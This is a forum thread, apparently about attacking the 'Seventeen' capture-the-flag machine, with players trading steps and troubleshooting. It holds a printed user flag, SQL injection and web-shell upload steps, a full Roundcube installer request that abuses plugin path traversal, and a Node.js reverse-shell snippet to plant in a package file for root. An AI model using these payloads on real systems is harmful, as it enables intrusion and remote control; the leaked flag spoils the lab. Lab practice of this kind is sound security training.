sudo /opt/app/startup.sh 

(May 30, 2022, 01:59 AM)Himitsu Wrote:

(May 29, 2022, 04:19 PM)Hoze Wrote: Where is the user.txt file tho?

Is it a joke 😎
Just need to logon via ssh using Mark credentials then you can retrieve in his home directory:

mark@seventeen:~$ ls -al
total 36
drwxr-x---  5 mark mark 4096 May 11 11:54 .
drwxr-xr-x  4 root root 4096 Apr  8 19:06 ..
lrwxrwxrwx  1 mark mark    9 Apr 10 03:17 .bash_history -> /dev/null
-rw-r--r--  1 mark mark  220 Apr  8 19:06 .bash_logout
-rw-r--r--  1 mark mark 3771 Apr  8 19:06 .bashrc
drwx------  2 mark mark 4096 Apr  8 19:26 .cache
drwx------  3 mark mark 4096 Apr  8 19:26 .gnupg
drwxrwxr-x 16 mark mark 4096 May 11 16:52 .npm
-rw-r--r--  1 mark mark  807 Apr  8 19:06 .profile
-rw-r-----  1 mark mark  33 May 29 15:15 user.txt
mark@seventeen:~$ cat user.txt

2020bestyearofmylife

I guess you tried harder before just ask...

(June 5, 2022, 09:04 AM)coolbyte Wrote: Just to make the point of the situation for the people late to the party.



Almost none of the main steps described in the first pages of this thread still work, the machine has been patched 5 days ago.



The steps so far are:



1. Discover exam subdomain

2. SQLi on the id parameter

3. Dump student credentials from DB

4. Login into student panel

5. Upload malicious shell, BUT, you need to modify the stud_no parameter to "31234/.." , because PHP execution inside the 31234 folder is blocked

6 You can trigger the shell directly through seventeen.htb:8000/oldmanager/files/shell.php OR it can be triggered through a CVE of Roundcube. Obviously it doesn't make sense to complicate the situation, but I have a hunch that the Roundcube CVE was supposed to be the intended way, and that the machine maker just messed with .htaccess file. So most likely the steps were supposed to be:

6.1 Go to mailmaster.seventeen.htb:8000/mailmaster/installer/

6.2 Upload a new configuration, where you will intercept and modify one of the _plugins_NAME parameters

_step=2&_product_name=Seventeen+Webmail&_support_url=&_skin_logo=&_temp_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Ftemp%2F&_des_key=iajOofMkjvHYKGsQZzdASvEh&_spellcheck_engine=googie&_identities_level=0&_log_driver=file&_log_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Flogs%2F&_syslog_id=roundcube&_syslog_facility=8&_dbtype=mysql&_dbhost=127.0.0.1&_dbname=roundcubedb&_dbuser=mysqluser&_dbpass=mysqlpassword&_db_prefix=&_default_host%5B%5D=127.0.0.1&_default_port=143&_username_domain=&_auto_create_user=1&_sent_mbox=Sent&_trash_mbox=Trash&_drafts_mbox=Drafts&_junk_mbox=Junk&_smtp_server=127.0.0.1&_smtp_port=587&_smtp_user=%25u&_smtp_pass=%25p&_smtp_user_u=1&_language=&_skin=elastic&_mail_pagesize=50&_addressbook_pagesize=50&_htmleditor=0&_draft_autosave=300&_mdn_requests=0&_mime_param_folding=1&_plugins_example_addressbook=example_addressbook&_plugins_filesystem_attachments=filesystem_attachments&_plugins_help=../../../../../../../../var/www/html/oldmanagement/files/31234&submit=UPDATE+CONFIG

This will make roundcube load a file at path /var/www/html/mastermailer/plugins/../../../../../../var/www/html/oldmanagement/files/31234/../../../../../../var/www/html/oldmanagement/files/31234.php, which means that both the path 31234 and the file called 31234.php need to exist at the same level.

7. Once a shell is obtained in the container, you can find the credentials for Mark in the dbh.php file

8. SSH into the box as Mark



Here is were I stopped.



- The file where other users have previously found the password for kavi user is not readable anymore

- The /opt/app/node_modules/ directory is not writeable anymore, so the rogue JS package cannot be just written there

- There is a Verdaccio registry locally at port 4873, I am assuming that we should find a way to publish packages through it, but user registration is disabled and no anonymous publishing is allowed (and nor mark nor kavi have access to it). The configuration of verdaccio is not even readable (/etc/verdaccio).

- There is a whole mail stack on the machine, it is really strange that it would be completely useless for the machine to be solved.

- There is another web app on port 31225 which I am not sure what it is.

If someone finds a legit way to get the password for the kavi user (i.e., not just from /opt/app/node_modules/db-logger/) would be nice, I am giving up on this machine because it seems to be really poorly made and at this point is just a waste of time without much learning.

(May 30, 2022, 01:54 AM)Peter Wrote:

(May 29, 2022, 06:27 AM)dude4695 Wrote: for root

better create 2 ssh connection 1 for running startup.sh and 1 for edit file

ssh1: sudo /opt/app/startup.sh

ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js

and add this function on top in file

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("bash", []);
    var client = new net.Socket();
    client.connect(PORT, "IP", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

you will get this payload from here

https://www.revshells.com/

stop startup.sh app and run again you will get root shell

I dont make to run. a file desapiers. no reverse shell , de code to inject banish.    Any tip o idea. please

(June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:

Folder /home/kavi/.npm is empty. And where is file package.tgz?
Thanks.